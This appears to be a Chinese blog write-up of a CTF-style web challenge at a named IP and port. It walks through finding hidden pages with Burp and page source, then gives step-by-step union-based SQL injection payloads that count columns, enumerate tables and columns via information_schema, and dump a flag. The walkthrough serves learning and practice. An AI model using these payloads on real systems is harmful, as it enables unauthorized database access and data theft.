手工注入基本思路

 目录

  1. 信息泄露

  2. 手工注入

 渗透思路

1. 返回包信息中泄露重要目录

(1)访问http://112.44.218.141:2014是一个空白页面,开始想到的就是查看robots,然后御剑目录扫描都没有得到有发现目录;然后就使用burp截包,可以看到提示目录welcome_solkdjiejq.php

 

(2)访问http://112.44.218.141:2014/welcome_solkdjiejq.php得到flag(flag理解为web中一个重要信息):

(3)查看源码得到一个目录/system_jioqwjod.php

 

访问提示只用本机可以登录

(4)访问http://112.44.218.141:2014/system_jioqwjod.php使用burp截包得到flag:

 

另外得到location: system_skkkwwwwqad/index.php

 

2.SQL注入

访问http://112.44.218.141:2014/system_skkkwwwwqad/index.php点击report1

1)在url后添加一个’报错,存在报错注入点

 

2)判断列数使用oder by n#

Order by 2#回显正常

Order by  3#回显错位,那么应该为2列;

3)判断回显为

 id=-1 union select 88,99#回显为第二列位置

 

(4)暴数据库http://112.44.218.141:2014/system_skkkwwwwqad/index.php?id=-2 union select 1,database()#

 

(5)暴数据表

暴数据库news下的第一个表f3aagg:

id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 0,1)#

 

第二个表news:

id=-2 union select 1,(select table_name from information_schema.tables where table_schema="news" limit 1,1)#

 

6)暴表f3aagg下的字段为f3gg1

id=-2 union select 1,(select column_name from information_schema.columns where table_name="f3aagg" limit 0,1)#

 

(7)查看内容得到flag{eccbc87e4b5ce2fe28308fd9f2a7baf3}

id=-2 union select 1,(select * from f3aagg limit 0,1)#

 

这就是sql注入基本的完整思路,按照这样方法可以再查看其它表、字段信息;

posted @ 2020-01-10 00:40  请叫我阿毛  阅读(558)  评论(0编辑  收藏  举报